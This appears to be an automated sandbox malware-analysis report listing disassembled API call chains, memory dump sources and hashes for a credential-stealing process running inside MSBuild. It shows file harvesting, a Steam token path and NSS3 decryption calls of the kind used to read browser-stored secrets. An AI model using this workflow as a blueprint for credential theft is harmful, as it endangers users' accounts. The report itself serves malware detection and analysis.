                                                                                          • Part of subcall function 00415EA0: wsprintfA.USER32 ref: 00415EBC
                                                                                          • Part of subcall function 00415EA0: FindFirstFileA.KERNEL32(?,?), ref: 00415ED3
                                                                                          • Part of subcall function 00415EA0: StrCmpCA.SHLWAPI(?,004201DC), ref: 00415EFC
                                                                                          • Part of subcall function 00415EA0: StrCmpCA.SHLWAPI(?,004201D8), ref: 00415F16
                                                                                          • Part of subcall function 00415EA0: wsprintfA.USER32 ref: 00415F3B
                                                                                          • Part of subcall function 00415EA0: StrCmpCA.SHLWAPI(?,004201E9), ref: 00415F4A
                                                                                          • Part of subcall function 00415EA0: wsprintfA.USER32 ref: 00415F67
                                                                                          • Part of subcall function 00415EA0: PathMatchSpecA.SHLWAPI(?,?), ref: 00415F97
                                                                                          • Part of subcall function 00415EA0: lstrcatA.KERNEL32(?,0169A440,?,000003E8), ref: 00415FC3
                                                                                          • Part of subcall function 00415EA0: lstrcatA.KERNEL32(?,004201E0), ref: 00415FD5
                                                                                          • Part of subcall function 00415EA0: lstrcatA.KERNEL32(?,?), ref: 00415FE3
                                                                                          • Part of subcall function 00415EA0: lstrcatA.KERNEL32(?,004201E0), ref: 00415FF5
                                                                                          • Part of subcall function 00415EA0: lstrcatA.KERNEL32(?,?), ref: 00416009
                                                                                          • Part of subcall function 00415EA0: wsprintfA.USER32 ref: 00415F86
                                                                                          • Part of subcall function 00415EA0: CopyFileA.KERNEL32(?,00000000,00000001), ref: 004160AA
                                                                                          • Part of subcall function 00415EA0: DeleteFileA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004201E9), ref: 00416119
                                                                                          • Part of subcall function 00415EA0: FindNextFileA.KERNEL32(?,?), ref: 00416160
                                                                                          • Part of subcall function 00415EA0: FindClose.KERNEL32(?), ref: 00416172
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000430000.00000040.00000400.00020000.00000000.sdmp
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000527000.00000040.00000400.00020000.00000000.sdmp
                                                                                        • Associated: 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmp
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmp
                                                                                        • Associated: 00000004.00000002.2343717434.000000000054F000.00000040.00000400.00020000.00000000.sdmp
                                                                                        • Associated: 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmp
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000607000.00000040.00000400.00020000.00000000.sdmp
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063B000.00000040.00000400.00020000.00000000.sdmp
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063D000.00000040.00000400.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                        • String ID:
                                                                                        • API String ID: 2104210347-0
                                                                                        APIs
                                                                                          • Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839
                                                                                          • Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,0168EE78,?,00423414,?,00000000,004201E9), ref: 0040F9B9
                                                                                          • Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
                                                                                          • Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB
                                                                                          • Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930
                                                                                        • lstrlenA.KERNEL32(00000000,00000000,?,00000000,004201E9,?,?,?,00416ED8,?,?), ref: 0041443F
                                                                                          • Part of subcall function 004142A0: Sleep.KERNEL32(000003E8,?,=OA,?,?,00000000), ref: 00414345
                                                                                          • Part of subcall function 004142A0: CreateThread.KERNEL32(00000000,00000000,004130F0,?,00000000,00000000), ref: 0041438D
                                                                                          • Part of subcall function 004142A0: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00414399
                                                                                        Strings
                                                                                        • Soft\Steam\steam_tokens.txt, xrefs: 00414454
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrcpy$lstrlen$CreateObjectSingleSleepThreadWaitlstrcat
                                                                                        • String ID: Soft\Steam\steam_tokens.txt
                                                                                        • API String ID: 2356188485-3507145866
                                                                                        APIs
                                                                                          • Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839
                                                                                          • Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,0168EE78,?,00423414,?,00000000,004201E9), ref: 0040F9B9
                                                                                          • Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
                                                                                          • Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB
                                                                                          • Part of subcall function 0040F940: lstrcpyA.KERNEL32(00000000,?,00000000,004176BE), ref: 0040F981
                                                                                          • Part of subcall function 0040F940: lstrcatA.KERNEL32(00000000), ref: 0040F98D
                                                                                          • Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930
                                                                                        • lstrlenA.KERNEL32(00000000), ref: 00407C9D
                                                                                        • lstrlenA.KERNEL32(00000000), ref: 00407CB1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrcpy$lstrlen$lstrcat
                                                                                        • String ID:
                                                                                        • API String ID: 2500673778-0
                                                                                        APIs
                                                                                        • VirtualAlloc.KERNEL32(?,00000000,00003000,00000040,00000000,?,?,?,0040688E,00000000), ref: 0040642F
                                                                                        • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040,?,?,0040688E,00000000), ref: 00406463
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 4275171209-0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        APIs
                                                                                        • VirtualProtect.KERNEL32(?,?,00000040,004068D6,?,?,?,?,004068D6,?,?,?,?,00000000), ref: 004067F5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ProtectVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 544645111-0
                                                                                        APIs
                                                                                        • SHGetFolderPathA.SHELL32(00000000,004201E9,00000000,00000000,?,00000000,?), ref: 00410D81
                                                                                          • Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FolderPathlstrcpy
                                                                                        • String ID:
                                                                                        • API String ID: 1699248803-0
                                                                                        APIs
                                                                                        • GetFileAttributesA.KERNEL32(00000000,?,?,0040B844,?,00000000,?,00000000,004201E9,004201E9), ref: 00410D1D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AttributesFile
                                                                                        • String ID:
                                                                                        • API String ID: 3188754299-0
                                                                                        • Opcode ID: 211951a67623cc10f1816536ae82aa56ec50d4b76de61764da72f65eecc1376d
                                                                                        • Instruction ID: fb15c47bbe0b93a4405a7b8ff06cc38f93f54865058fbad0eae59745ca59ce08
                                                                                        • Opcode Fuzzy Hash: 211951a67623cc10f1816536ae82aa56ec50d4b76de61764da72f65eecc1376d
                                                                                        • Instruction Fuzzy Hash: 92E0867260012817CB10BAE9E8015DA7758DF407B5B44453AF90DEA5D1DB38AEC587C8
                                                                                        APIs
                                                                                        • PORT_NewArena_Util.NSS3(00000800), ref: 6C6CA670
                                                                                          • Part of subcall function 6C6E0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C6887ED,00000800,6C67EF74,00000000), ref: 6C6E1000
                                                                                          • Part of subcall function 6C6E0FF0: PR_NewLock.NSS3(?,00000800,6C67EF74,00000000), ref: 6C6E1016
                                                                                          • Part of subcall function 6C6E0FF0: PL_InitArenaPool.NSS3(00000000,security,6C6887ED,00000008,?,00000800,6C67EF74,00000000), ref: 6C6E102B
                                                                                        • PK11_GetInternalKeySlot.NSS3 ref: 6C6CA67E
                                                                                        • PK11_Authenticate.NSS3(00000000,00000001,?), ref: 6C6CA69B
                                                                                          • Part of subcall function 6C6A9520: PK11_IsLoggedIn.NSS3(00000000,?,6C6D379E,?,00000001,?), ref: 6C6A9542
                                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C6CA6C0
                                                                                        • TlsGetValue.KERNEL32 ref: 6C6CA703
                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C6CA718
                                                                                        • PR_Unlock.NSS3(?), ref: 6C6CA78B
                                                                                        • PK11_CreateContextBySymKey.NSS3(00000133,00000104,?,00000000), ref: 6C6CA7DD
                                                                                        • PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6C6CA7FA
                                                                                        • PORT_Alloc_Util.NSS3(00000000), ref: 6C6CA818
                                                                                        • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C6CA82F
                                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C6CA868
                                                                                        • PORT_FreeArena_Util.NSS3(00000000,00000001), ref: 6C6CA873
                                                                                        • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C6CA884
                                                                                        • PK11_FreeSymKey.NSS3(00000000), ref: 6C6CA894
                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,00000000), ref: 6C6CA8D9
                                                                                        • PK11_CipherOp.NSS3(?,00000000,?,00000000,00000000,00000000), ref: 6C6CA8F0
                                                                                        • SEC_ASN1EncodeItem_Util.NSS3(00000000,?,?,6C7E0B04), ref: 6C6CA93F
                                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C6CA952
                                                                                        • PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C6CA961
                                                                                        • PK11_DestroyContext.NSS3(?,00000001), ref: 6C6CA96E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Util$K11_$Item_$Zfree$Arena_Free$Alloc_ArenaContext$AuthenticateBlockCipherCreateCriticalDestroyEncodeEnterInitInternalLockLoggedPoolSectionSizeSlotUnlockValuecallocmemcpy
                                                                                        • String ID:
                                                                                        • API String ID: 1441238854-0
                                                                                        • Opcode ID: 0f2662c7b12fa2bf32e21f202bb3f3a45f5092dd6b356803e48c5aa4c4215bb1
                                                                                        • Instruction ID: d94a2012fa58f586d94f4fab89c7f68d28544a86791cf5df6a6ac90a5b9bd11c
                                                                                        • Opcode Fuzzy Hash: 0f2662c7b12fa2bf32e21f202bb3f3a45f5092dd6b356803e48c5aa4c4215bb1
                                                                                        • Instruction Fuzzy Hash: EF91E7B1E012089FEB00DFA4DC45AAE77B8EF15308F144525E815AB742F771991ACBAA
                                                                                        APIs
                                                                                        • PK11_HPKE_Deserialize.NSS3(?,?,?,00000000), ref: 6C6B05E3
                                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6B060C
                                                                                        • PK11_HPKE_DestroyContext.NSS3(?,00000000), ref: 6C6B061A
                                                                                        • PK11_PubDeriveWithKDF.NSS3 ref: 6C6B0712
                                                                                        • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C6B0740
                                                                                        • memcpy.VCRUNTIME140(?,00000006,?), ref: 6C6B0760
                                                                                        • PR_SetError.NSS3(FFFFE00E,00000000), ref: 6C6B07AE
                                                                                        • PK11_FreeSymKey.NSS3(?), ref: 6C6B07BC
                                                                                        • PK11_FreeSymKey.NSS3(?), ref: 6C6B07D1
                                                                                        • SECKEY_DestroyPublicKey.NSS3(?), ref: 6C6B07DD
                                                                                        • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C6B07EB
                                                                                        • SECITEM_ZfreeItem_Util.NSS3(00000001,00000001), ref: 6C6B07F8
                                                                                        • PK11_CreateContextBySymKey.NSS3(?,82000105,?,?), ref: 6C6B082F
                                                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 6C6B08A9
                                                                                        • SECITEM_DupItem_Util.NSS3(?), ref: 6C6B08D0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: K11_$Item_Util$ContextDestroyErrorFreeZfreememcpy$AllocCreateDeriveDeserializePublicWith
                                                                                        • String ID:
                                                                                        • API String ID: 657680294-0
                                                                                        • Opcode ID: b3f99e85071e2a86499945143bc8fe383ca3b920e67e2bb30c08ca067c9caab5
                                                                                        • Instruction ID: b25f5207db29c9726e11d8f669a6a177dcf46a6bad597f7f21571e6b80ed3a2c
                                                                                        • Opcode Fuzzy Hash: b3f99e85071e2a86499945143bc8fe383ca3b920e67e2bb30c08ca067c9caab5
                                                                                        • Instruction Fuzzy Hash: 9D91C4B1A083419FE700CF25DA44B5BBBE1EF84318F14852CE99997751FB31D964CB8A
                                                                                        APIs
                                                                                        • PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C681C6F,00000000,00000004,?,?), ref: 6C6D6C3F
                                                                                          • Part of subcall function 6C72C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C72C2BF
                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,6C681C6F,00000000,00000004,?,?), ref: 6C6D6C60
                                                                                        • PR_ExplodeTime.NSS3(00000000,6C681C6F,?,?,?,?,?,00000000,00000000,00000000,?,6C681C6F,00000000,00000004,?,?), ref: 6C6D6C94
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Alloc_ArenaErrorExplodeTimeUtilValue
                                                                                        • String ID: gfff$gfff$gfff$gfff$gfff
                                                                                        • API String ID: 3534712800-180463219
                                                                                        • Opcode ID: 2537412f649d1b5b12c26790da163225c6b3f25994265ecaa62f5ccc710f12fa
                                                                                        • Instruction ID: 636e7b41d99490de196757aab33155310178815fc3b4ea942e8e096422151b56
                                                                                        • Opcode Fuzzy Hash: 2537412f649d1b5b12c26790da163225c6b3f25994265ecaa62f5ccc710f12fa
                                                                                        • Instruction Fuzzy Hash: E4516B72B016494FC70CCDADDC526DEB7DAABA4310F48C23AE442DB781DA38E906C751
                                                                                        APIs
                                                                                        • PR_CallOnce.NSS3(6C7E14E4,6C74CC70), ref: 6C798D47
                                                                                        • PR_GetCurrentThread.NSS3 ref: 6C798D98
                                                                                          • Part of subcall function 6C670F00: PR_GetPageSize.NSS3(6C670936,FFFFE8AE,?,6C6016B7,00000000,?,6C670936,00000000,?,6C60204A), ref: 6C670F1B
                                                                                          • Part of subcall function 6C670F00: PR_NewLogModule.NSS3(clock,6C670936,FFFFE8AE,?,6C6016B7,00000000,?,6C670936,00000000,?,6C60204A), ref: 6C670F25
                                                                                        • PR_snprintf.NSS3(?,?,%u.%u.%u.%u,?,?,?,?), ref: 6C798E7B
                                                                                        • htons.WSOCK32(?), ref: 6C798EDB
                                                                                        • PR_GetCurrentThread.NSS3 ref: 6C798F99
                                                                                        • PR_GetCurrentThread.NSS3 ref: 6C79910A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentThread$CallModuleOncePageR_snprintfSizehtons
                                                                                        • String ID: %u.%u.%u.%u
                                                                                        • API String ID: 1845059423-1542503432
                                                                                        • Opcode ID: d9833fadbfb4275e1c45426401f553e34ac7221002bdcf5772c4fd80250f6e1a
                                                                                        • Instruction ID: d5c9680b10ace95c6b8c0a62a9017d08c49428d7ae59c2576b6b5a7047adb388
                                                                                        • Opcode Fuzzy Hash: d9833fadbfb4275e1c45426401f553e34ac7221002bdcf5772c4fd80250f6e1a
                                                                                        • Instruction Fuzzy Hash: 2002DC319452518FEB18CF19C6687AABBB3EF52344F29C26EC8964FB92C331D905C390
                                                                                        APIs
                                                                                        • _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6C75C3A2,?,?,00000000,00000000), ref: 6C73A528
                                                                                        • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011843,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C73A6E0
                                                                                        • _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C73A71B
                                                                                        • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C73A738
                                                                                        Strings
                                                                                        • %s at line %d of [%.10s], xrefs: 6C73A6D9
                                                                                        • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C73A6CA
                                                                                        • database corruption, xrefs: 6C73A6D4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: _byteswap_ushort$_byteswap_ulongsqlite3_log
                                                                                        • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                        • API String ID: 622669576-598938438
                                                                                        • Opcode ID: 998683307bdc4654ae3972a90dae3a159ae9d954ec64f3c2391d48719473f9cf
                                                                                        • Instruction ID: d888b5200fc2a96d206570c1131afe0cfbd335db7a4a3661d0f0fa6ea04263d6
                                                                                        • Opcode Fuzzy Hash: 998683307bdc4654ae3972a90dae3a159ae9d954ec64f3c2391d48719473f9cf
                                                                                        • Instruction Fuzzy Hash: 0E91F7717083218FCB04CF68C585A5AB7E1BF58324F045A6DE89ACBB92E730EC44C792
                                                                                        APIs
                                                                                        • TlsGetValue.KERNEL32 ref: 6C714571
                                                                                        • memset.VCRUNTIME140(?,00000000,00000000), ref: 6C7145B1
                                                                                        • memcpy.VCRUNTIME140(?,?,00000020), ref: 6C7145C2
                                                                                          • Part of subcall function 6C7104C0: WaitForSingleObject.KERNEL32(ED850FC0,000000FF,?,00000000,?,6C71461B,-00000004), ref: 6C7104DF
                                                                                          • Part of subcall function 6C7104C0: PR_SetError.NSS3(FFFFE89D,00000000,?,00000000,?,6C71461B,-00000004), ref: 6C710534
                                                                                        • PR_Now.NSS3 ref: 6C714626
                                                                                          • Part of subcall function 6C749DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C790A27), ref: 6C749DC6
                                                                                          • Part of subcall function 6C749DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C790A27), ref: 6C749DD1
                                                                                          • Part of subcall function 6C749DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C749DED
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C714634
                                                                                        • memcmp.VCRUNTIME140(?,?,?,00000000,?,000F4240,00000000), ref: 6C7146C4
                                                                                        • PR_SetError.NSS3(FFFFD05A,00000000,00000000,?,000F4240,00000000), ref: 6C7146E3
                                                                                        • PR_SetError.NSS3(?,00000000), ref: 6C714722
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorTime$SystemUnothrow_t@std@@@__ehfuncinfo$??2@$FileObjectSingleValueWaitmemcmpmemcpymemset
                                                                                        • String ID:
                                                                                        • API String ID: 1183590942-0
                                                                                        • Opcode ID: caff30995b82781650489b18a899ca78fa0c76d71cf67f071d7bcdb5c64f16ae
                                                                                        • Instruction ID: 5848dce2a595252036f5b1c32662e8d06a17aa3afd3d0c2da11392af8aa8c185
                                                                                        • Opcode Fuzzy Hash: caff30995b82781650489b18a899ca78fa0c76d71cf67f071d7bcdb5c64f16ae
                                                                                        • Instruction Fuzzy Hash: C961E2B1E046049FEB10CF28D988B9AB7F5FF59308F584538E8459BA51E730F904CB80
                                                                                        APIs
                                                                                        • memset.VCRUNTIME140(?,00000000,?), ref: 6C694444
                                                                                        • PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C694466
                                                                                          • Part of subcall function 6C6E1200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C6888A4,00000000,00000000), ref: 6C6E1228
                                                                                          • Part of subcall function 6C6E1200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C6E1238
                                                                                          • Part of subcall function 6C6E1200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C6888A4,00000000,00000000), ref: 6C6E124B
                                                                                          • Part of subcall function 6C6E1200: PR_CallOnce.NSS3(6C7E2AA4,6C6E12D0,00000000,00000000,00000000,?,6C6888A4,00000000,00000000), ref: 6C6E125D
                                                                                          • Part of subcall function 6C6E1200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C6E126F
                                                                                          • Part of subcall function 6C6E1200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C6E1280
                                                                                          • Part of subcall function 6C6E1200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C6E128E
                                                                                          • Part of subcall function 6C6E1200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C6E129A
                                                                                          • Part of subcall function 6C6E1200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C6E12A1
                                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C69447A
                                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C69448A
                                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C694494
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        APIs
                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C79D086
                                                                                        • PR_Malloc.NSS3(00000001), ref: 6C79D0B9
                                                                                        • PR_Free.NSS3(?), ref: 6C79D138
                                                                                        APIs
                                                                                        • memcpy.VCRUNTIME140(00000000,?,00000000,00000000,00000000), ref: 6C6F1052
                                                                                        • memset.VCRUNTIME140(-0000001C,?,?,00000000), ref: 6C6F1086
                                                                                        APIs
                                                                                        • memcpy.VCRUNTIME140(?,?,6C6F5A85), ref: 6C712675
                                                                                        • PK11_Encrypt.NSS3(?,00001081,00000000,?,?,00000010,?,00000010), ref: 6C712659
                                                                                          • Part of subcall function 6C6C3850: TlsGetValue.KERNEL32 ref: 6C6C389F
                                                                                          • Part of subcall function 6C6C3850: EnterCriticalSection.KERNEL32(?), ref: 6C6C38B3
                                                                                          • Part of subcall function 6C6C3850: PR_Unlock.NSS3(?), ref: 6C6C38F1
                                                                                          • Part of subcall function 6C6C3850: TlsGetValue.KERNEL32 ref: 6C6C390F
                                                                                          • Part of subcall function 6C6C3850: EnterCriticalSection.KERNEL32(?), ref: 6C6C3923
                                                                                          • Part of subcall function 6C6C3850: PR_Unlock.NSS3(?), ref: 6C6C3972
                                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C712697
                                                                                        • PK11_Encrypt.NSS3(?,?,?,?,00000000,6C6F5A85,?,6C6F5A85), ref: 6C712717
                                                                                        APIs
                                                                                        • bind.WSOCK32(?,?,?,?,6C676401,?,?,0000001C), ref: 6C676422
                                                                                        • WSAGetLastError.WSOCK32(?,?,?,?,6C676401,?,?,0000001C), ref: 6C676432
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLastbind
                                                                                        • String ID:
                                                                                        • API String ID: 2328862993-0
                                                                                        • Opcode ID: f456ccdb1e3c1fd0dfe4ea7f50aef8be549060bf7dd6523552c17151d2cde162
                                                                                        • Instruction ID: c368a0586855b330d4604f8e343840e73080da34afaf29efb2379f93bd727cbc
                                                                                        • Opcode Fuzzy Hash: f456ccdb1e3c1fd0dfe4ea7f50aef8be549060bf7dd6523552c17151d2cde162
